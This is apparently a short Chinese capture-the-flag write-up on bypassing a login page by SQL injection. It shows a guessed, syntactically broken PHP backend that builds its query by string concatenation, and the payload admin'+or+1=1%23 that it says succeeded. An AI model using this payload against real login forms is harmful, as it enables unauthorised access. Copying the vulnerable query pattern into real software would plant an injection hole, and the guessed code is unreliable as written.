目录
题目分析
1.题目提示是一个sql注入题目,登录查看
根据题目判断,是一个sql注入题目,而且应该是绕过登录的用户名和密码就可以正常登录
2.Brup抓包分析
GET传参,所以我们猜测其后端代码大概为
<?php
#猜测php后端代码为
$username=$_GET['username'];
$pwd=$_GET['password'];
$sql=select * from users where username='$username' and password='password';
$ result=query($sql);
?>
sql注入
1.判断是否存在注入点
#构造的后端sql语句为
select * from users where username='admin' or 1=1#' and password="123";
#所以我们输入
admin'+or+1=1%23&password=123
然后发现直接绕过成功了,无语